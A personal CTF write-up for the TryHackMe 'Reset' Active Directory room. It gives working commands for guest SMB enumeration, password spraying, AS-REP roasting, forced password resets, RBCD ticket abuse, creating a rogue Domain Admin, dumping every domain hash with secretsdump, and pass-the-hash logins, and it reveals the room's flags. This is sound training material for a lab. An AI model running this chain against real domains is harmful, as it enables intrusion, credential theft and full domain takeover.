TryHackMe Reset Walkthrough
TL;DR walkthrough of the TryHackMe Reset room (https://tryhackme.com/room/resetui).
THM Walkthroughs:
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
Reset isn’t a bad room. It is unfortunately hobbled by the TryHackMe restriction on free, user created rooms; only 1 VM allowed. This of course puts a serious disability on the potential of any AD focused rooms. After all, no org is going to run a DC just to run a DC. The entire point of AD is to include member servers for running services like Exchange, Sharepoint, MSSQL, file servers, etc and workstations for the end users to, you know, use.
Absent a 0 Day like ZeroLogon or the old classic EternalBlue an attacker is unlikely to find success directly attacking a DC. They will likely have to compromise a Domain User via phishing, USB drive drops, or similar TTPs so they can enumerate the domain first. They will then move laterally, compromise additional users and workstations, and eventually find a way to escalate privileges. They may escalate to a user account that has minimal privileges in AD but has full control in NTFS on the file server, run ransomware, and call it a day. Attackers have their own goal, and they don’t necessarily need to become a Domain Admin to accomplish it and ruin the org’s day.
I found myself hobbled by TryHackMe’s room restrictions when I created a room. I had to put a mere shadow of what I had wanted to on TryHackMe, and use some serious duct tape. It was ugly. Hence I don’t blame Reset’s author for the bizarre things I found at the end of the room.
On an administrative note, the astute reader may notice that the IP of THM’s VM changes during this walkthrough. This is due to THM’s time limit on running a VM. I took notes as I went and always jotted down any usernames/credentials compromised so I could pick back up later where I had left off. There are no reverse shells used in this room, so any IPs shown in any commands are the THM VM’s.
Initial Enumeration
We start the Reset room with just the VM’s IP and the hint that it’s likely a DC.
sudo nmap -sV -O 10.10.77.204
Nice, so we now know it’s a DC for the domain thm.corp. Let’s try an old trick and try enumerating using the Guest account. Who knows, maybe it’s still enabled?
enum4linux -u thm.corp\\guest -a 10.10.130.147Nice, the guest account is enabled with no password. We find a share drive: 10.10.77.204\data
Let’s connect and see what’s there.
smbclient \\\\10.10.130.147\\Data -U thm.corp\\guestThe filenames keep changing, so let’s just pull them all real fast
smbclient \\\\10.10.130.147\\Data -U thm\\guest -c 'prompt OFF;recurse ON;cd 'onboarding';lcd '/home/kali/Downloads/Reset';mget *'
Check the text file in Mousepad and we find a password that might be useful for password spraying.
Subject: Welcome to Reset -<A0>Dear <USER>,Welcome aboard!
We are thrilled to have you join our team.
As discussed during the hiring process, we are sending you the necessary login information to access your company account.
Please keep this information confidential and do not share it with anyone.
The initial passowrd is: ResetMe123!
We are confident that you will contribute significantly to our continued success.
We look forward to working with you and wish you the very best in your new role.
Best regards,
The Reset TeamWe just need a list of usernames to spray. Let’s abuse guest access to enumerate usernames.
/usr/share/doc/python3-impacket/examples/lookupsid.py thm.corp/guest@10.10.220.153
Copy/paste the output, parse with PowerShell, and save to CorpUsers.
$Lines = Get-Content .\LookupSID_Output.txt
ForEach($Line in $Lines)
{
($Line.split("\")[1]).split(" ")[0] | Out-File .\CorpUsers.txt -Append
}Now we have a nice list of usernames saved as CorpUsers.txt to try using that password.
crackmapexec smb 10.10.130.147 -u /home/kali/Downloads/Reset/CorpUsers.txt -p ResetMe123\! --continue-on-success
/home/kali/Downloads/exploits/kerbrute_linux_amd64 passwordspray -d thm.corp - dc 10.10.77.204 /home/kali/Downloads/Wordlists/CorpUsers 'ResetMe123!'
We get a hit on LILY_ONEILL, so let’s reset Lily’s password.
/usr/share/doc/python3-impacket/examples/smbpasswd.py LILY_ONEILL@10.10.77.204Now we have LILY_ONEILL \ P@$$w0rd.
enum4linux -u thm.corp\\lily_oneill -p P@\$\$w0rd -a 10.10.77.204
smbclient \\\\10.10.77.204\\Data -U thm.corp\\LILY_ONEILLBut Lily_Oneill is a dead end
It turns out that Lily doesn’t really have any more access than Guest, however remember that list of usernames we created? It’s handy for trying ASREPRoasting and Kerberoasting as the attacker needs access as a Domain User and a list of usernames to try for both of those attacks.
Let’s try ASREPRoasting.
/usr/share/doc/python3-impacket/examples/GetNPUsers.py thm.corp/ -no-pass -usersfile /home/kali/Downloads/Wordlists/CorpUsers.txtWe get 3 hits, so let’s run all 3 through hashcat and john.
john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/Wordlists/ASREPWe get a hit!
TABATHA_BRITT \ marlboro(1985)
Tabitha has RDP access to the DC. This is unlikely in a real environment or even a multi VM range as DCs don’t allow mere Domain Users to RDP or WinRM into them by default. However THM restricts these rooms to one VM, so often the room creator has to allow this manually. I had to in the room I created. I was cringing the entire time.
Tabitha can login via CLI or GUI.
evil-winrm -i 10.10.227.202 -u TABATHA_BRITT -p marlboro(1985)
xfreerdp /v:10.10.130.147 /u:TABATHA_BRITT /p:marlboro\(1985\) /dynamic-resolutionThe problem is that this VM was rather janky. I couldn’t even get it to run PowerView. Hence I enumerated from Kali, which I believe is the way the room author expected us to do so.
Open a new BASH tab on Kali and run the backend DB and Bloodhound. I posted a howto here showing how to get Bloodhound up and running on both Windows and Kali. Normally one would run Bloodhound on a standalone [i.e. a system that’s not connected to the target domain] and only run the collector against the target. In other words we analyze the information in Bloodhound offline.
cd Downloads
./neo4j-desktop-1.6.0-x86_64.AppImage
bloodhoundEnumerate the target domain so we can upload the data to Bloodhound.
sudo bloodhound-python -d thm.corp -u TABATHA_BRITT -p marlboro\(1985\) -ns 10.10.158.22 -c all
Clear the Bloodhound database if you already had a domain in there and then upload all the JSON files generated by the command above.
Mark Tabatha_Britt & Lily_Oneill as owned.
DACL enumeration and abuse
We find a path to move laterally. Tabitha can move through the following accounts by resetting their passwords.
- Shawna_Bray
- Cruz_Hall
- Darla_Winters
These password resets can be done from Kali, but I already had a cheatsheet handy for doing so from Windows and Tabitha has RDP access to the VM, so why not right?
Pin PowerShell_ISE to the taskbar. This makes it easy to right click & ‘Run as a different user’.
Set-ADAccountPassword -Identity Shawna_Bray -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)
#Now run PowerShell_ISE as Shawna
Set-ADAccountPassword -Identity Cruz_Hall -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)
#Repeat; close PowerShell, then run as Cruz_Hall
Set-ADAccountPassword -Identity Darla_Winters -Reset -NewPassword (ConvertTo-SecureString 'Password00' -AsPlainText -Force)We now have access to Darla_Winters. This is important as Darla can escalate privileges, not just move laterally.
RBCD
I posted a howto on Resource Based Constrained Delegation (RBCD) here, showing both how to put it into a cyber range and how to abuse it from the attacker perspective. Of course in the cyber range I created the attacker is using RBCD to move laterally from one domain client to another domain client.
Again though, Reset’s author ran into THM’s restriction on the number of VMs. They gave Darla, a mere Domain User, RBCD rights on the DC … and we have to abuse it from Kali.
Put the DC’s IP in the /etc/hosts file for both the computer name “haystack” and the domain name “thm.corp”. This makes the below commands work seamlessly.
/usr/share/doc/python3-impacket/examples/getST.py -k -impersonate Administrator -spn cifs/HAYSTACK.THM.CORP THM.CORP/DARLA_WINTERS
export KRB5CCNAME=Administrator@cifs_HAYSTACK.THM.CORP@THM.CORP.ccache
/usr/share/doc/python3-impacket/examples/wmiexec.py THM.CORP/Administrator@HAYSTACK.THM.CORP -k -no-passWe get a legacy cmd.exe shell. If it was PowerShell we would just do:
New-ADUser -Name "Mishky" -AccountPassword(ConvertTo-SecureString -AsPlainText 'Password00' -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "Mishky"But since it’s legacy cmd.exe:
dsadd user "CN=Mishky,CN=Users,DC=thm,DC=corp" -samid Mishky -pwd Password00
net group "Domain Admins" Mishky /add /domain
Yes, I had to ask CW6 Google how to do that in legacy cmd.exe. What can I say, I like PowerShell.
Now we can RDP as a Domain Admin and find anything we want.
xfreerdp /v:10.10.130.147 /u:Mishky /p:Password00 /dynamic-resolutionGet-ChildItem -Path "C:\Users" -Recurse -Filter *.txt | Get-Content
This gets us the answers to the only two questions in the room.
User flag: THM{AUTOMATION_WILL_REPLACE_US}
Root flag: THM{RE_RE_RE_SET_AND_DELEGATE}Post compromise enumeration & notes
Note the “user flag” is in automate’s folder. We never used this account. We went from Guest -> Emily [merely a detour] -> Tabatha -> bunch of pwd resets -> Darla -> Admin. I guess we missed the intended path and took the scenic route. Well the old saying does go “if it’s stupid but it works, then it isn’t stupid”. Besides, a real attacker doesn’t care how they get there, just that they can.
While we have Domain Admin access, let’s dump all the hashes in AD.
/usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc Mishky:Password00@10.10.130.147
Alternately, add >> /home/kali/Downloads/Reset/All_Hashes.txt to the end of the above command IOT save all hashes for later.
We can now PTH as Administrator using evil-winrm.
evil-winrm -i 10.10.130.147 -u Administrator -H 067a84e5afaed843ed4a8fdac5facac3Note that Cecile_Wong & Horace_Boyle are also Domain Admins and all Domain Admins have the same hash: 067a84e5afaed843ed4a8fdac5facac3
evil-winrm -i 10.10.220.153 -u Cecile_Wong -H 067a84e5afaed843ed4a8fdac5facac3
#disable RestrictedAdmin Mode, aka allow RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -forcexfreerdp /v:10.10.220.153 /u:Cecile_Wong /pth:067a84e5afaed843ed4a8fdac5facac3 /dynamic-resolutionSummary
I enumerated a bit more as Cecile_Wong, looking for exactly how Darla_Winters had delegation rights. Bloodhound doesn’t tell you why she does, only that she does and how to abuse it. The consensus on Google is that she is listed in the ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the DC’s AD account.
However I was unable to confirm this in the VM via Active Directory Users & Computers (ADUC, aka dsa.msc), ADSIEdit.msc, or PowerShell … and as aforementioned the VM refused to function with PowerView even after I jumped on as a Domain Admin and disabled Defender.
Even ChapGPT was flummoxed.
Oh well, I know how I set it up in our cyber range … or rather I created an escalation path whereby the attacker can give themselves the right to set it up :p
In summary, it’s not a bad room. It covered enumeration and abuse of DACLs in AD, which is an important and often neglected topic. It only suffered from the THM imposed restriction of 1 VM per room.
References
https://www.kali.org/tools/bloodhound/
https://www.kali.org/tools/bloodhound.py/
https://github.com/dirkjanm/BloodHound.py
https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/
https://wadcoms.github.io/wadcoms/Impacket-getST-Creds/
https://docs.tenable.com/identity-exposure/SaaS/Content/User/AttackPath/AllowedToAct.htm
https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b
